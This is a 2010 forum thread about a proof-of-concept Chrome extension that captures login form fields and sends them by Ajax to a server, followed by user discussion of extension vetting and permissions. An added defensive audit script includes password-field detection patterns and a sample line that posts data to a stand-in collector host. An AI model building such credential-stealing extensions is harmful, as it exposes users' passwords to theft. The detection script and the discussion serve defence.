
This is a discussion on Proof of Concept - Google Chrome login get HACK within the Bugs and Vulnerabilities section, part of the Google Chrome category.


  1. #1
    Wacky_Sung is offline Junior Member
    Join Date
    Apr 2010
    Posts
    22

    Proof of Concept - Google Chrome login get HACK

    Friday, July 9, 2010
    Stealing login details with a Google Chrome extension
    In this post I will demonstrate a proof of concept of how an attacker can steal usernames and passwords via a Google Chrome Extension.


    The Google Chrome browser allows the installation of third-party extensions that are used to extend the browser to add new features. The extensions are written in JavaScript and HTML and allow manipulation of the DOM, amongst other features.

    By allowing access to the DOM, an attacker can thus read form fields...including username and password fields. This is what sparked my idea of creating this PoC.



    The extension I present here is very simple. Whenever a user submits a form, it tries to capture the username and password fields, sends me an email via an Ajax call to a script with these login details along with the URL, and then proceeds to submit the form normally so as to avoid detection.

    This simple procedure has been successful against Gmail, Facebook, Twitter and other major websites.

    http://blog.dreasgrech.com/2010/07/s...th-google.html

  2. #2
    Waha is offline Senior Member
    Join Date
    Apr 2009
    Location
    Oregon
    Posts
    788

    Yeah, never gonna be patched though, too limiting. This is why Chrome warns you about what sites the extension wants permission to.
    After all, the one unpatchable security hole is human stupidity.
    ~ Projects ~
    Specialized: Carapass Auction Watcher, Kongregate Chat
    Libraries: bliplib
    Tools: manifest syntax highlighting & snippits
    ~ Happy to make extensions for pay too ;D ~
    Portfolio: Search and Share

  3. #3
    vasa1 is offline Senior Member
    Join Date
    Jun 2010
    Posts
    101

    I assume that extensions that are on the official Google site are vetted and that the concern/PoC is relevant to unofficial extensions, that is, if the screeners at Google do a good job.

    I don't know whether what I'm asking makes sense but here goes... Since JavaScript and HTML are relatively easy to look at, can there be a sort of parser for idiots that could look at a script or HTML code and summarise the activity even in broad terms?

    Waha wrote:
    This is why Chrome warns you about what sites the extension wants permission to
    From the few extensions I used, it appears that the warning is very general to the effect that the extension requires total access to your computer. That causes a lot of people to freak out!

    (I guess even ordinary users with a little experience can spot a dodgy url if they know where to look in the unzipped extension.)

    in edit:
    I just looked at the code provided in the OP's message and I have a newbie question:
    nowhere in the code is the author's e-mail address mentioned, even fictionally. The closest that one gets is "SendMail". So how can the browser convey our details to the author?
    Last edited by vasa1; 07-11-2010 at 03:28 AM.
    Latest stable on WinXP

  4. #4
    PAEz is offline Moderator
    Join Date
    Aug 2009
    Location
    Australia
    Posts
    656

    vasa1 wrote:
    I assume that extensions that are on the official Google site are vetted and that the concern/PoC is relevant to unofficial extensions, that is, if the screeners at Google do a good job.
    From my understanding they only actually review things that use the file:// protocol or a plugin; other stuff just gets put on straight away.

    vasa1 wrote:
    I don't know whether what I'm asking makes sense but here goes... Since javascript and html are relatively easy to look at, can there be a sort of parser for idiots that could look at a script or html code and summarise the activity even in broad terms.
    This would take a huge amount of work trying to cater for all the different ways this could be done, and a nasty could hide their activities as well if there was such a thing. You'd basically need an antivirus-like thing and it would take a lot to do.

    vasa1 wrote:
    From the few extensions I used, it appears that the warning is very general to the effect that the extension requires total access to your computer. That causes a lot of people to freak out!
    Yeah, you either freak out and don't install it or you just get so used to it you end up saying yes to everything.
    The best defense you have against this sort of thing is other users and the comment section of the extension page. There would be a lot of users like me that look at the code of almost everything they install. I look at code for something to do, and if I noticed something odd like sending an ajax when it didn't need to, I'd post a comment and so would others. One of the big reasons I love Chrome so much is because of how easy their extension system is; unlike Firefox, which can confuse the hell out of me, Chrome's extensions are easy to read.

    vasa1 wrote:
    in edit:
    I just looked at the code provided in the OP's message and I have a newbie question:
    nowhere in the code is the author's e-mail address mentioned, even fictionally. The closest that one gets is "SendMail". So how can the browser convey our details to the author?
    The SendMail sends the information to a server that then sends an email to him.
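
The manual review described in post #4, and the "summarise the activity" idea from post #3, sketched as a static triage script for an unpacked extension. This is an added example, not part of the thread or of the linked PoC; the manifest, file fragments and `collector.example` URL are constructed samples, and the regex signals are heuristic assumptions that obfuscated code can evade.

```javascript
// Added example: static triage of an unpacked Chrome extension (constructed sample data).
const BROAD_HOSTS = ['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*'];

// Heuristic signals (assumptions); obfuscated code can evade them.
const SIGNALS = [
  { name: 'reads password fields', re: /type\s*=\s*['"]?password/i },
  { name: 'hooks form submission', re: /addEventListener\(\s*['"]submit['"]|\.onsubmit\s*=/ },
  { name: 'makes network requests', re: /XMLHttpRequest|\bfetch\s*\(|\$\.(ajax|post|get)\s*\(/ },
];

function auditExtension(manifest, files) {
  const report = { broadHosts: [], signals: {}, urls: [], risk: 'low' };
  // Host access can be declared in several places depending on manifest version.
  const patterns = [
    ...(manifest.permissions || []),
    ...(manifest.host_permissions || []),
    ...(manifest.content_scripts || []).flatMap((cs) => cs.matches || []),
  ];
  report.broadHosts = [...new Set(patterns.filter((p) => BROAD_HOSTS.includes(p)))];
  for (const [file, src] of Object.entries(files)) {
    const hits = SIGNALS.filter((s) => s.re.test(src)).map((s) => s.name);
    if (hits.length) report.signals[file] = hits;
    // Every hard-coded URL is a candidate destination worth a manual look.
    for (const m of src.matchAll(/https?:\/\/[^\s'"`)]+/g)) report.urls.push(m[0]);
  }
  const seen = new Set(Object.values(report.signals).flat());
  // Password access plus outbound requests is the combination to escalate.
  if (seen.has('reads password fields') && seen.has('makes network requests')) {
    report.risk = report.broadHosts.length ? 'high' : 'medium';
  }
  return report;
}

// Constructed sample: fragments only, standing in for an unzipped extension.
const sampleManifest = {
  content_scripts: [{ matches: ['http://*/*', 'https://*/*'], js: ['content.js'] }],
};
const sampleFiles = {
  'content.js': [
    "var pw = document.querySelector('input[type=password]');",
    "document.forms[0].addEventListener('submit', onSubmit, false);",
    "var xhr = new XMLHttpRequest();",
    "xhr.open('POST', 'http://collector.example/SendMail', true);",
  ].join('\n'),
  'options.js': "document.title = 'Options';",
};

console.log(JSON.stringify(auditExtension(sampleManifest, sampleFiles), null, 2));
```

A "high" result only means the extension combines page-wide access, password-field reads and outbound requests; the listed URLs still need a human to judge whether the destination is expected.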

  5. #5
    vasa1 is offline Senior Member
    Join Date
    Jun 2010
    Posts
    101

    Quote Originally Posted by PAEz View Post
    ...The best defense you have against this sort of thing is other users and the comment section of the extension page...
    That is true and the easiest for us end-users.
    Latest stable on WinXP

  6. #6
    Wacky_Sung is offline Junior Member
    Join Date
    Apr 2010
    Posts
    22

    Personally, prior to this proof of concept that I have posted, I just find that the Google Chrome browser should have a master password manager just like Firefox. I dislike Google Chrome lacking this security feature. Indeed, installing a proper extension has never been easy, just as Firefox has even reported that their own addon got a trojan which they had missed.

    http://www.zdnet.com/blog/hardware/u...ojan-code/7171

    The best security is zero extension / addon.

  7. #7
    PAEz is offline Moderator
    Join Date
    Aug 2009
    Location
    Australia
    Posts
    656

    Wacky_Sung wrote:
    The best security is zero extension / addon.
    Which is why chrome has incognito mode and extensions are not enabled in this mode by default. If you want an extension to run in incognito mode you have to explicitly enable it too on the extensions page.
    So the utterly paranoid are still best off in Chrome.

  8. #8
    Bloody_Turds is offline Senior Member
    Join Date
    Aug 2009
    Posts
    152

    Chrome still could give a separate set of permissions, to record, the name, and password fields, along with certain other fields (creditcard cough), or even prompt when the reading of secure happens (allowing Chrome to stop the extension in its tracks, or allow it to carry on)

  9. #9
    PAEz is offline Moderator
    Join Date
    Aug 2009
    Location
    Australia
    Posts
    656

    Bloody_Turds wrote:
    chrome still could give a separate set of permissions, to record, the name, and password fields, along with certain other fields (creditcard cough
    Name and credit card might be a hassle, but password elements are distinct and so they could do a permission for that for sure....would make sense....plus maybe restrict the reading of input elements on https pages

  10. #10
    vasa1 is offline Senior Member
    Join Date
    Jun 2010
    Posts
    101

    Apparently, something similar has been yanked from the official Mozilla site:
    http://blog.mozilla.com/addons/2010/...-announcement/
    The actual author of the PoC in the original post in this thread has appended a comment on that blog.
    Latest stable on WinXP
